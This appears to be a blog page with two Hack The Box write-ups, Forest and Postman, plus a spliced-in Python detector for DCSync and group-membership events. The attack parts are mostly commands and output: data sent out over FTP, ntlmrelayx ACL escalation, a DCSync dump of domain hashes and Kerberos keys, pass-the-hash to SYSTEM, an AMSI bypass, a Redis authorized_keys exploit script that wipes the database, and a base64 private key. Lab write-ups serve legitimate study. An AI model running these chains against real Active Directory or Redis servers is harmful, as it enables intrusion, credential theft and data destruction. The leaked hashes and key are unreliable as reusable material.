Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip


Info: Download successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

After the SharpHound script and binary are transferred, I run them as the user svc-alfresco and the script produces a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey is to create and run a small FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an active FTP server on my attacker machine, which can easily be done with Python:

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been transferred successfully and can be loaded directly into BloodHound by simply dragging and dropping it.

In the BloodHound overview of the shortest path to domain admin, I see that a user who is a member of the ‘Exchange Windows Permissions’ group has WriteDacl on the entire HTB.local domain object, which can be used to grant DCSync replication rights and thus retrieve the password hashes. I can also see that the svc-alfresco user has GenericAll on that particular group through its nested memberships of `Service Accounts`, `Privileged IT Accounts` and `Account Operators`.

PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc-alfresco account to the ‘Exchange Windows Permissions’ group, it is removed again after a few minutes, which is quite a pain. So I decided to add my own user to the domain with the same password as svc-alfresco and add that user to the `Exchange Windows Permissions` group. After that, however, I got stuck for a long time on the very specific syntax and switches required (and available) in the impacket tools. If some Discord users had not helped me, I would probably have given up, so I have to thank them for pushing me through the next step!

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the local listener and provide valid credentials; ntlmrelayx will do all the hard work and change the permissions for me. I open a browser to localhost and provide the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do next: sedje now has the right permissions to continue with secretsdump.py.

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---

secretsdump.py returns all the hashes in the domain. With the Administrator NT hash I can pass the hash with psexec.py and get a SYSTEM shell:

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
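An added example, not from the writeup: detection logic in Python for the two traces this escalation leaves in the domain controller's Security log, a member added to ‘Exchange Windows Permissions’ (event 4728/4732/4756) and replication rights exercised by a principal that is not a domain controller (event 4662 carrying the DS-Replication-Get-Changes GUIDs), which is what DCSync looks like. The replication GUIDs are the documented AD schema values; the event records are constructed samples, and `dc_hostnames` is an assumed allowlist you would fill from your own environment.

```python
"""Flag DCSync-style replication by non-DC principals (4662) and additions to
groups that hold dangerous rights on the domain object (4728/4732/4756)."""
import re

# Extended-right GUIDs from the AD schema that replication (and so DCSync)
# requires; fixed, documented values, not data from this page.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Groups whose membership changes deserve an alert; the first is the group
# abused in this writeup (it holds WriteDacl on the domain object).
WATCHED_GROUPS = {
    "Exchange Windows Permissions",
    "Exchange Trusted Subsystem",
    "Account Operators",
    "Domain Admins",
    "Enterprise Admins",
}

# 4728 / 4732 / 4756 = member added to a global / local / universal security group
GROUP_ADD_EVENTS = {4728, 4732, 4756}

_GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")


def is_dc_account(name: str, dc_hostnames) -> bool:
    """Replication by a DC's own machine account (e.g. FOREST$) is normal."""
    return name.endswith("$") and name[:-1].upper() in {h.upper() for h in dc_hostnames}


def detect(events, dc_hostnames):
    """Walk parsed Security events (dicts holding the EventData fields we need)
    and return (rule, actor, detail) alerts in input order."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4662:
            # Properties is a free-text blob of access strings and GUIDs;
            # pull every GUID out of it and keep the replication ones.
            guids = {g.lower() for g in _GUID_RE.findall(ev.get("Properties", ""))}
            rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
            if rights and not is_dc_account(ev["SubjectUserName"], dc_hostnames):
                alerts.append(("DCSYNC", ev["SubjectUserName"], rights))
        elif eid in GROUP_ADD_EVENTS and ev["TargetUserName"] in WATCHED_GROUPS:
            alerts.append(("SENSITIVE_GROUP_ADD", ev["SubjectUserName"],
                           f"{ev['MemberName']} -> {ev['TargetUserName']}"))
    return alerts


# Constructed sample events modelled on the chain above (not real log lines).
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "svc-alfresco",
     "MemberName": "CN=sedje,CN=Users,DC=htb,DC=local",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 4662, "SubjectUserName": "FOREST$",   # DC-to-DC replication: benign
     "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "sedje",     # DCSync from a user account
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "sedje",     # ordinary object access, no alert
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000001}"},
]

if __name__ == "__main__":
    for rule, actor, detail in detect(SAMPLE_EVENTS, dc_hostnames={"FOREST"}):
        print(rule, actor, detail)
```

Event 4662 with these GUIDs is only logged when auditing of directory service access is enabled on the domain object, so the rule is worthless without that audit policy in place.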

….

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add


The command completed successfully.


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1


Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

,. ( . ) " ,. ( . ) . 
(" ( ) )' ,' ( ' (" ) )' ,' . ,) 
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( 
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') 
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ 
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ 
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/

By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty 
[+] ConvertTo-SID 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Export-PowerViewCSV 
[+] field 
[+] Find-DomainLocalGroupMember 
[+] Find-DomainObjectPropertyOutlier 
[+] Find-DomainProcess 
[+] Find-DomainShare 
[+] Find-DomainUserEvent 
[+] Find-DomainUserLocation 
[+] Find-InterestingDomainAcl 
[+] Find-InterestingDomainShareFile 
[+] Find-InterestingFile 
[+] Find-LocalAdminAccess 
[+] func 
[+] Get-Domain 
[+] Get-DomainComputer 
[+] Get-DomainController 
[+] Get-DomainDFSShare 
[+] Get-DomainDNSRecord 
[+] Get-DomainDNSZone 
[+] Get-DomainFileServer 
[+] Get-DomainForeignGroupMember 
[+] Get-DomainForeignUser 
[+] Get-DomainGPO 
[+] Get-DomainGPOComputerLocalGroupMapping 
[+] Get-DomainGPOLocalGroup 
[+] Get-DomainGPOUserLocalGroupMapping 
[+] Get-DomainGroup 
[+] Get-DomainGroupMember 
[+] Get-DomainGroupMemberDeleted 
[+] Get-DomainGUIDMap 
[+] Get-DomainManagedSecurityGroup 
[+] Get-DomainObject 
[+] Get-DomainObjectAcl 
[+] Get-DomainObjectAttributeHistory 
[+] Get-DomainObjectLinkedAttributeHistory 
[+] Get-DomainOU 
[+] Get-DomainPolicyData 
[+] Get-DomainSearcher 
[+] Get-DomainSID 
[+] Get-DomainSite 
[+] Get-DomainSPNTicket 
[+] Get-DomainSubnet 
[+] Get-DomainTrust 
[+] Get-DomainTrustMapping 
[+] Get-DomainUser 
[+] Get-DomainUserEvent 
[+] Get-Forest 
[+] Get-ForestDomain 
[+] Get-ForestGlobalCatalog 
[+] Get-ForestSchemaClass 
[+] Get-ForestTrust 
[+] Get-GPODelegation 
[+] Get-GptTmpl 
[+] Get-GroupsXML 
[+] Get-IniContent 
[+] Get-NetComputerSiteName 
[+] Get-NetLocalGroup 
[+] Get-NetLocalGroupMember 
[+] Get-NetLoggedon 
[+] Get-NetRDPSession 
[+] Get-NetSession 
[+] Get-NetShare 
[+] Get-PathAcl 
[+] Get-PrincipalContext 
[+] Get-RegLoggedOn 
[+] Get-WMIProcess 
[+] Get-WMIRegCachedRDPConnection 
[+] Get-WMIRegLastLoggedOn 
[+] Get-WMIRegMountedDrive 
[+] Get-WMIRegProxy 
[+] Invoke-Binary 
[+] Invoke-Kerberoast 
[+] Invoke-RevertToSelf 
[+] Invoke-UserImpersonation 
[+] New-ADObjectAccessControlEntry 
[+] New-DomainGroup 
[+] New-DomainUser 
[+] New-DynamicParameter 
[+] New-InMemoryModule 
[+] New-ThreadedFunction 
[+] psenum 
[+] Remove-DomainGroupMember 
[+] Remove-DomainObjectAcl 
[+] Remove-RemoteConnection 
[+] Resolve-IPAddress 
[+] Set-DomainObject 
[+] Set-DomainObjectOwner 
[+] Set-DomainUserPassword 
[+] struct 
[+] Test-AdminAccess
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>


┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:abc123!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
---snip---
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
puck:aes256-cts-hmac-sha1-96:06e262b4631831eb9e36337f221a12ef9002d822111e2cf0b6986677b43de401
puck:aes128-cts-hmac-sha1-96:b36d7c9f29063935479a113ac05ce4f7
puck:des-cbc-md5:d97915c119025dd9
FOREST$:aes256-cts-hmac-sha1-96:667d61b318e1302ef1861f3dfe5f89ef1d737f7f277da9841f64dc6b49de811b
FOREST$:aes128-cts-hmac-sha1-96:2376f9c19c4bb9a61f7008ecb735af41
FOREST$:des-cbc-md5:15bffbfb9dcb2c51
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Author: Puckiestyle

HTB-POSTMAN-NL

Postman Write up Hack the box


This writeup covers Postman on Hack The Box. It was a Linux box that starts with exploiting an unauthenticated Redis instance to get an initial foothold. We then enumerate and find an encrypted SSH key belonging to Matt, and crack the key's passphrase. The same credentials work on the Webmin instance running on port 10000, where we use Metasploit to get root on the system. Overall, Postman was a relatively easy machine.

Walkthrough

Scanning Network

I did an initial Nmap scan and did not find much: only SSH and port 80, which was not enough. So I did a full port scan with RustScan (which hands the open ports to Nmap) and got these results.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $rustscan 10.10.10.160
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/puck/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.160:22
Open 10.10.10.160:80
Open 10.10.10.160:6379
Open 10.10.10.160:10000
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80,6379,10000 10.10.10.160

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 08:06 CEST
Initiating Ping Scan at 08:06
Scanning 10.10.10.160 [2 ports]
Completed Ping Scan at 08:06, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 08:06
Scanning 10.10.10.160 [4 ports]
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Completed Connect Scan at 08:06, 0.09s elapsed (4 total ports)
Nmap scan report for 10.10.10.160
Host is up, received syn-ack (0.089s latency).
Scanned at 2022-06-03 08:06:24 CEST for 0s

PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack
80/tcp    open  http             syn-ack
6379/tcp  open  redis            syn-ack
10000/tcp open  snet-sensor-mgmt syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
┌─[puck@parrot-lt]─[~/htb/postman]


So now I have Webmin on 10000, Redis on 6379, SSH and HTTP. I found an exploit published by the developer of Redis himself. Apparently he says that Redis has one security model: there is no security model. Don't expose it to the internet; keep it in a closed network and only give access to users who are authorised to use it.

Understanding how the exploit works

The exploit works because an unauthenticated Redis instance lets any client rewrite its own configuration and dump its database to disk: CONFIG SET dir picks the directory, CONFIG SET dbfilename picks the file name, and SAVE writes the RDB file there as the redis user. On this box the redis user has a writable .ssh directory in its home, so an attacker can store their own public key as a value, point the dump at .ssh/authorized_keys, save, and SSH in as redis with the matching private key.

Although on Hack The Box everyone was trying to use the same exploit, which made it hell to exploit the system manually, because people were overwriting the public key like mad. After 3-4 hours of trying I figured this was not going to work, so I automated it with this script.

#!/bin/bash
# exploit.sh: push our SSH public key into the redis user's authorized_keys
# through the unauthenticated Redis instance (CONFIG SET dir/dbfilename + SAVE).
KEY="$HOME/.ssh/id_rsa"

# Fresh key pair; remove the old one first so ssh-keygen does not ask to overwrite.
rm -f "$KEY" "$KEY.pub"
ssh-keygen -t rsa

# Pad the key with blank lines: SAVE wraps the value in a binary RDB header and
# trailer, and sshd only needs the key to sit on a line of its own.
(echo -e "\n\n"; cat "$KEY.pub"; echo -e "\n\n") > foo.txt

redis-cli -h 10.10.10.160 flushall                       # wipe every key (and other players' keys): destructive
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit   # -x reads the value from stdin
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save

ssh -i "$KEY" redis@10.10.10.160


┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $ssh -i /home/puck/.ssh/id_rsa redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$


Save it as exploit.sh, run it, press Enter through the ssh-keygen prompts and you get access to the system as redis. Sometimes it is glitchy and takes two or three tries to get the shell, but with the script we are set up for one. I ran LinEnum.sh and found nothing; then I looked in /opt and found an encrypted SSH key.

Getting user on Postman.

redis@Postman:/var$ cd /opt
redis@Postman:/opt$ ls
id_rsa.bak
redis@Postman:/opt$ base64 id_rsa.bak 
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsNzNFOUNFRkJDQ0Y1Mjg3QwoKSmVoQTUxSTE3cnNDT09WcXlX
eCtDODM2M0lPQllYUTExRGR3L3ByM0wyQTJORHRCN3R2c1hOeXFLRGdoZlFuWApjd0dKSlVEOWtL
Sm5pSmtKenJ2RjFXZXB2TU5rajlaSXRYUXpZTjh3Ympscmt1MWJKcTV4bkpYOUVVYjVJN2syCjdH
c1R3c012S3pYa2tmRVpRYVhLL1Q1MHMzSTRDZGNmYnIxZFhJeWFiWExMcFpPaVpFS3ZyNCtLeVNq
cDRvdTYKY2RuQ1doemtBL1R3SnBYRzFXZU9tTXZ0Q1pXMUhDQnV0WXNOUDZCRGY3OGJRR21tbGly
cVJtWGZMQjkySmhUOQoxdThKekhDSjF6Wk1HNXZhVXR2b24wcWdQeDd4ZUlVTzZMQUZUb3pyTjlN
R1dFcUJFSjV6TVZycnQzVEdWa2N2CkV5dmxXd2tzN1IvZ2p4SHlVd1QrYTVMQ0dHU2pWRDg1THhZ
dXRnV3hPVUtidFdHQmJVOHlpN1lzWGxLQ3d3SFAKVUg3T2ZRejAzVld5K0swYWE4UXMrRXl3Nlgz
d2JXbnVlMDNuZy9zTEpuSjcyOXpiM2t1eW04citoVSs5djZWWQpTaitRbmpWVFlqRGZuVDIyakpC
VUhUVjJ5cktlQXo2Q1hkRlQreEloeEVBaXYwbTFaa2t5UWtXcFVpQ3p5dVlLCnQrTVN0d1d0U3Qw
Vko0VTFOYTJHM3hHUGptcmttandYdnVkS0MwWU4vT0JvUFBPVGFCVkQ5aTZmc29aNnB3blMKNU1p
OEJ6ckJoZE8wd0hhRGNUWVBjM0IwMEN3cUFWNU1YbWtBazJ6S0wwVzJ0ZFZZa3NLd3hLQ3dHbVds
cGRrZQpQMkpHbHA5TFdFZXJNZm9sYmpUU09VNW1EZVBmTVEzZndDTzZNUEJpcXpyckZjUE5Kcjcv
TWNRRUNiNXNmK082CmpLRTNKZm4wVVZFMlFWZFZLM29FTDZEeWFCZi9XMmQvM1Q3cTEwVWQ3Sys0
S2QzNmd4TUJmMzNFYTYrcXgzR2UKU2JKSWhrc3c1VEtoZDUwNUFpVUgyVG44OXFOR2VjVkpFYmpL
ZUovdkZaQzVZSXNRKzlzbDg5VG1KSEw3NFkzaQpsM1lYREVzUWpoWkh4WDVYL1JVMDJEK0FGMDdw
M0JTUmpoRDMwY2pqMHV1V2tLb3dwb28wWTBlYmxnbWQ3bzJYCjBWSVdyc2tQSzRJN0lINWdia3J4
VkdiLzlnL1cydWExQzNObmN2M01OY2YwbmxJMTE3QlMvUXdOdHVUb3pHOHAKUzlrM2xpK3JZcjZm
M21hL1VMc1VuS2labHM4U3BVK1JzYW9zTEdLWjZwMm9JZThvUlNtbE9Dc1kwSUNxN2VSUgpoa3V6
VXVIOXovbUJvMnRRV2g4cXZUb0NTRWpnOHlOTzl6OCtMZG9OMXdRV01QYVZ3UkJqSXl4Q1BIRlRK
M3UrClp4eTB0SVB3akNadnhVZlluL0s0RlZIYXZ2QStiOWxvcG5VQ0VBRVJwd0l2OCt0WW9md0dW
cExWQzBEck41OFYKWFRmQjJYOXNMMW9CM2hPNG1KRjBaM3lKMktaRWRZd0hHdXFOVEZhZ04wZ0Jj
eU5JMndzeFpOeklLMjZ2UHJPRApiNkJjOVVkaVdDWnFNS1V4NGFNVExoRzVST2pnUUd5dFdmL3E3
TUdyTzNjRjI1azFQRVdOeVpNcVk0V1lzWlhpCldoUUZIa0ZPSU53VkVPdEhha1ovVG9ZYVVRTnRS
VDZwWnlIZ3ZqVDBtVG8wdDNqVUVSc3BwajFwd2JnZ0NHbWgKS1RrbWhLK01UYW95ODlDZzBYdzJK
MThEbTBvNzhwNlVOcmtTdWUxQ3NXakVmRUlGM05BTUVVMm8rTmdxOTJIbQpucEFGUmV0dndRN3h1
a2swcmJiNm12RjhnU3FMUWc3V3BiWkZ5dGdTMDVUcFBaUE0waDh0UkU4WVJkSmhlV3JRClZjTnla
SDhPSFlxRVM0ZzJVRjYyS3B0dHFTd0xpaUY0dXRIcSsvaDVDUXdzRitKUmc4OGJueGgyejJCRDZp
NVcKWCtoSzVIUHBwNlFualo4QTVFUnVVRUdhWkJFVXZHSnRQR0hqWnlMcGt5dE1oVGphT3JSTll3
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K

To transfer it to my machine and crack the passphrase, I base64-encoded the key, then used base64 -d to decode it back into an SSH key and saved it as Matts.KEy.

